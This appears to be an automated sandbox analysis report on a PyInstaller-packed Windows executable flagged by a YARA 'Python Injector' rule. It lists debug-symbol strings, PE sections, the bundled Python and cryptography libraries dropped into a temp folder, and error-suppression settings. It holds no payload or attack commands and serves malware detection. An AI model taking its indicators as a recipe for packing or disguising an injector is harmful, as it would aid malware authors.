        Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: DChOtFdp9T.exe, 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
        Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687027078.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb(('GCTL source: DChOtFdp9T.exe, 00000000.00000003.1684680424.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1881098109.00007FFE13204000.00000002.00000001.01000000.0000000C.sdmp, _wmi.pyd.0.dr
        Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686366365.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685177805.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684283969.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1880596191.00007FFE120C6000.00000002.00000001.01000000.00000016.sdmp
        Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687394800.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: DChOtFdp9T.exe, 00000000.00000003.1683174444.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1882140131.00007FFE1A464000.00000002.00000001.01000000.00000006.sdmp, VCRUNTIME140.dll.0.dr
        Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686035517.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.0.dr
        Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687990709.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: DChOtFdp9T.exe, 00000001.00000002.1875750642.00007FFDFB13A000.00000002.00000001.01000000.00000014.sdmp, libcrypto-3.dll.0.dr
        Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686550010.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.0.dr
        Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686216151.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: DChOtFdp9T.exe, 00000000.00000003.1703446111.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1880914876.00007FFE12E13000.00000002.00000001.01000000.0000000F.sdmp, select.pyd.0.dr
        Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1688827777.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686729797.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687253081.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686838745.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685584111.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: DChOtFdp9T.exe, 00000000.00000003.1684100382.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1880770005.00007FFE126EB000.00000002.00000001.01000000.0000000B.sdmp
        Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1688107451.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685966419.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684364998.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1880682032.00007FFE126C3000.00000002.00000001.01000000.00000010.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684680424.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1881098109.00007FFE13204000.00000002.00000001.01000000.0000000C.sdmp, _wmi.pyd.0.dr
        Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685896929.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: DChOtFdp9T.exe, 00000000.00000003.1696738812.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872247576.0000017808110000.00000002.00000001.01000000.00000007.sdmp
        Source: Binary string: D:\a\1\b\libssl-3.pdb source: DChOtFdp9T.exe, 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
        Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687837125.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1688439421.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: DChOtFdp9T.exe, 00000001.00000002.1880262151.00007FFE1150D000.00000002.00000001.01000000.00000012.sdmp, _ssl.pyd.0.dr
        Source: DChOtFdp9T.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: DChOtFdp9T.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: DChOtFdp9T.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: DChOtFdp9T.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: DChOtFdp9T.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation

        barindex
        Yara detected Python Injector
        Source: Yara matchFile source: Process Memory Space: DChOtFdp9T.exe PID: 4020, type: MEMORYSTR
        Source: VCRUNTIME140.dll.0.drStatic PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]
        Source: python312.dll.0.drStatic PE information: section name: PyRuntim
        Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
        Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
        Source: libcrypto-3.dll.0.drStatic PE information: section name: .00cfg
        Source: libssl-3.dll.0.drStatic PE information: section name: .00cfg
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF264331 push rcx; ret 1_2_00007FFDFF264332
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0074B989 push rdi; ret 1_2_00007FFE0074B992
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0075145F push rdi; ret 1_2_00007FFE00751466
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE00750D4D push rdi; ret 1_2_00007FFE00750D54
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0074BEA5 push rdi; ret 1_2_00007FFE0074BEAB

        Persistence and Installation Behavior

        barindex
        Found pyInstaller with non standard icon
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeProcess created: "C:\Users\user\Desktop\DChOtFdp9T.exe"
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\_socket.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\_bz2.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA384.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_des.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\_overlapped.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_MD5.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_ofb.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\cryptography\hazmat\bindings\_rust.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\ucrtbase.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\python312.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_ed448.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_ctr.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_cfb.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_ghash_clmul.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_BLAKE2s.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_aesni.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_curve448.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\_multiprocessing.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-file-l1-2-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_ed25519.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_ocb.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_aes.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\_queue.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\unicodedata.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_keccak.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_ec_ws.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\python3.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_Salsa20.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_curve25519.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-file-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\_lzma.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_BLAKE2b.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\_ctypes.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA512.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-string-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_MD2.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\_ssl.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA1.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\_asyncio.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_chacha20.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Math\_modexp.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\VCRUNTIME140.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_MD4.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\_hashlib.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-console-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_ARC4.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-file-l2-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA224.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\_cffi_backend.cp312-win_amd64.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\pyexpat.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_RIPEMD160.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Util\_strxor.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\libcrypto-3.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\VCRUNTIME140_1.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_ecb.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_ghash_portable.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\_wmi.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\_decimal.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA256.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Util\_cpuid_c.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\libssl-3.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-util-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_arc2.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_des3.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Protocol\_scrypt.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\bcrypt\_bcrypt.cp312-win_amd64.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\libffi-8.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_poly1305.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_cast.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\select.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_cbc.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF602995090 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF602995090
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
